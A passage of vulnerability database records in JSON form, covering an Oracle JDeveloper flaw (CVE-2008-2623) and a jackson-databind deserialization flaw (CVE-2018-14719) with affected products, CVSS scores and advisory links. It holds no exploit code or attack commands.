"af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1797", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2804", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3002", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3140", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Release Notes", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286%40%3Cdev.lucene.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f%40%3Cdev.lucene.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df%40%3Cdev.lucene.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1%40%3Ccommits.druid.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-502", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2009-01-14 02:30
Modified
2025-04-09 00:30
Severity ?
Summary
Unspecified vulnerability in the Oracle JDeveloper component in Oracle Application Server 10.1.2.3 allows local users to affect confidentiality via unknown vectors.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| oracle | jdeveloper | 10.1.2.3 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:jdeveloper:10.1.2.3:*:*:*:*:*:*:*", matchCriteriaId: "1EAEAAF4-3DF9-40B0-BCCE-455932F885A2", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Unspecified vulnerability in the Oracle JDeveloper component in Oracle Application Server 10.1.2.3 allows local users to affect confidentiality via unknown vectors.", }, { lang: "es", value: "Vulnerabilidad no especificada en el componente Oracle JDeveloper en Oracle Application Server 10.1.2.3 permite a usuarios locales afectar la confidencialidad mediante vectores desconocidos.", }, ], evaluatorComment: "Note 2 in Oracle Application Server Risk Matrix states \"The versions in the matrix refer to standalone versions of JDeveloper.\" Therefore, Oracle Application Server was not included in the CPE configuration.", id: "CVE-2008-2623", lastModified: "2025-04-09T00:30:58.490", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "LOW", cvssData: { accessComplexity: "LOW", accessVector: "LOCAL", authentication: "NONE", availabilityImpact: "NONE", baseScore: 2.1, confidentialityImpact: "PARTIAL", integrityImpact: "NONE", vectorString: "AV:L/AC:L/Au:N/C:P/I:N/A:N", version: "2.0", }, exploitabilityScore: 3.9, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], }, published: "2009-01-14T02:30:00.233", references: [ { source: "cve@mitre.org", url: "http://secunia.com/advisories/33525", }, { source: "cve@mitre.org", url: "http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.html", }, { source: "cve@mitre.org", url: "http://www.securityfocus.com/bid/33177", }, { source: "cve@mitre.org", url: "http://www.securitytracker.com/id?1021572", }, { source: "cve@mitre.org", url: "http://www.vupen.com/english/advisories/2009/0115", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://secunia.com/advisories/33525", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.securityfocus.com/bid/33177", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.securitytracker.com/id?1021572", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.vupen.com/english/advisories/2009/0115", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Deferred", weaknesses: [ { description: [ { lang: "en", value: "NVD-CWE-noinfo", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2019-01-02 18:29
Modified
2024-11-21 03:49
Severity ?
Summary
FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the blaze-ds-opt and blaze-ds-core classes from polymorphic deserialization.
References
Impacted products
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "7036DA13-110D-40B3-8494-E361BBF4AFCD", versionEndExcluding: "2.6.7.3", versionStartIncluding: "2.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "B99066EB-FF79-4D9D-9466-B04AD4D3A814", versionEndExcluding: "2.7.9.5", versionStartIncluding: "2.7.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "F4D3858C-DAF3-4522-90EC-EFCD13BD121E", versionEndExcluding: "2.8.11.3", versionStartIncluding: "2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "4DA01839-5250-43A7-AFB7-871DC9B8AB32", versionEndExcluding: "2.9.7", versionStartIncluding: "2.9.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", matchCriteriaId: "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", vulnerable: true, }, { criteria: "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", matchCriteriaId: "DEECE5FC-CACF-4496-A3E7-164736409252", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:banking_platform:2.5.0:*:*:*:*:*:*:*", matchCriteriaId: "35AD0C07-9688-4397-8D45-FBB88C0F0C11", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*", matchCriteriaId: "8972497F-6E24-45A9-9A18-EB0E842CB1D4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*", matchCriteriaId: "400509A8-D6F2-432C-A2F1-AD5B8778D0D9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", matchCriteriaId: "132CE62A-FBFC-4001-81EC-35D81F73AF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B887E174-57AB-449D-AEE4-82DD1A3E5C84", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E869C417-C0E6-4FC3-B406-45598A1D1906", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:clusterware:12.1.0.2.0:*:*:*:*:*:*:*", matchCriteriaId: "6C9084DB-329E-403F-8D0A-5B9F53183714", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5:*:*:*:*:*:*:*", matchCriteriaId: "E6039DC7-08F2-4DD9-B5B5-B6B22DD2409F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0:*:*:*:*:*:*:*", matchCriteriaId: "7231AF76-3D46-41C4-83E9-6E9E12940BD9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:database_server:11.2.0.4:*:*:*:*:*:*:*", matchCriteriaId: "C1E11A25-C7CE-49DF-99CA-352FD21B8230", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:database_server:12.1.0.2:*:*:*:*:*:*:*", matchCriteriaId: "4F3D40B7-925C-413D-AFF3-60BF330D5BC2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:database_server:12.2.0.1:*:*:*:*:*:*:*", matchCriteriaId: "5C614BA7-7103-4ED7-ADD0-56064FE256A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:database_server:18c:*:*:*:*:*:*:*", matchCriteriaId: "6833701E-5510-4180-9523-9CFD318DEE6A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:database_server:19c:*:*:*:*:*:*:*", matchCriteriaId: "B2204841-585F-40C7-A1D9-C34E612808CA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.2.2:*:*:*:*:*:*:*", matchCriteriaId: "A9E97F04-00ED-48E9-AB40-7A02B3419641", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.2.3:*:*:*:*:*:*:*", matchCriteriaId: "FCCE5A11-39E7-4BBB-9E1A-BA4B754103BB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.3.1:*:*:*:*:*:*:*", matchCriteriaId: "A5AEC7F5-C353-4CF5-96CE-8C713A2B0C92", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.2:*:*:*:*:*:*:*", matchCriteriaId: "BB79BB43-E0AB-4F0D-A6EA-000485757EEC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.3:*:*:*:*:*:*:*", matchCriteriaId: "F238CB66-886D-47E8-8DC0-7FC2025771EB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.4:*:*:*:*:*:*:*", matchCriteriaId: "59B7B8AD-1210-4C40-8EF7-E2E8156630A1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.5:*:*:*:*:*:*:*", matchCriteriaId: "0DE4A291-4358-42A9-A68D-E59D9998A1CC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "0D19CF00-FE20-4690-AAB7-8E9DBC68A94F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "A030A498-3361-46F8-BB99-24A66CAE11CA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", matchCriteriaId: "F6455EB1-C741-45E8-A53E-E7AD7A5D00EE", versionEndExcluding: "11.2.0.3.23", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", matchCriteriaId: "BFD43191-E67F-4D1B-967B-3C7B20331945", versionEndExcluding: "12.2.0.1.19", versionStartIncluding: "12.2.0.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", matchCriteriaId: "062C588A-CBBA-470F-8D11-2F961922E927", versionEndExcluding: "13.9.4.2.1", versionStartIncluding: "13.9.4.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*", matchCriteriaId: "7A1E1023-2EB9-4334-9B74-CA71480F71C2", versionEndIncluding: "17.12", versionStartIncluding: "17.7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:15.1:*:*:*:*:*:*:*", matchCriteriaId: "93A4E178-0082-45C5-BBC0-0A4E51C8B1DE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:15.2:*:*:*:*:*:*:*", matchCriteriaId: "3F021C23-AB9B-4877-833F-D01359A98762", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:16.1:*:*:*:*:*:*:*", matchCriteriaId: "2F8ED016-32A1-42EE-844E-3E6B2C116B74", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:16.2:*:*:*:*:*:*:*", matchCriteriaId: "A046CC2C-445F-4336-8810-930570B4FEC6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:18.8:*:*:*:*:*:*:*", matchCriteriaId: "0745445C-EC43-4091-BA7C-5105AFCC6F1F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", matchCriteriaId: "08FA59A8-6A62-4B33-8952-D6E658F8DAC9", versionEndIncluding: "17.12", versionStartIncluding: "17.7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", matchCriteriaId: "D55A54FD-7DD1-49CD-BE81-0BE73990943C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", matchCriteriaId: "82EB08C0-2D46-4635-88DF-E54F6452D3A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", matchCriteriaId: "202AD518-2E9B-4062-B063-9858AE1F9CE2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*", matchCriteriaId: "792DF04A-2D1B-40B5-B960-3E7152732EB8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_merchandising_system:16.0:*:*:*:*:*:*:*", matchCriteriaId: "46525CA6-4226-4F6F-B899-D800D4DDE0B5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_workforce_management_software:1.60.9.0.0:*:*:*:*:*:*:*", matchCriteriaId: "9967AAFD-2199-4668-9105-207D4866B707", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D6A4F71A-4269-40FC-8F61-1D1301F2B728", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:redhat:openshift_container_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "3A76E5BF-01E4-46E7-8E3B-5ACE75657360", versionEndExcluding: "3.11.153", versionStartIncluding: "3.11", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:openshift_container_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "E9A6D103-9674-4B04-8397-86501F1D91CF", versionEndExcluding: "4.6.26", versionStartIncluding: "4.6", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:redhat:openshift_container_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "D2452F48-6A8B-4274-B0CE-F1256F400170", versionEndExcluding: "4.1.18", versionStartIncluding: "4.1", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", matchCriteriaId: "142AD0DD-4CF3-4D74-9442-459CE3347E3A", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", matchCriteriaId: "5735E553-9731-4AAC-BCFF-989377F817B3", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", matchCriteriaId: "BDFB1169-41A0-4A86-8E4F-FDA9730B1E94", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:*:*:*:*:*:*:*:*", matchCriteriaId: "09A8C9D2-9FFF-4312-95FB-87D79B3C0339", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the blaze-ds-opt and blaze-ds-core classes from polymorphic deserialization.", }, { lang: "es", value: "Las versiones 2.x de FasterXML jackson-databind anteriores a la 2.9.7 podrían permitir a los atacantes remotos ejecutar código arbitrario aprovechando un fallo para bloquear las clases blaze-ds-opt y blaze-ds-core de deserialización polimórfica.", }, ], id: "CVE-2018-14719", lastModified: "2024-11-21T03:49:40.010", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "HIGH", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2019-01-02T18:29:00.387", references: [ { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0877", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1782", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1797", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2804", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3002", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3140", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { source: "cve@mitre.org", tags: [ "Patch", "Release Notes", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0877", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1782", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1797", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2804", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3002", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3140", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Release Notes", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: 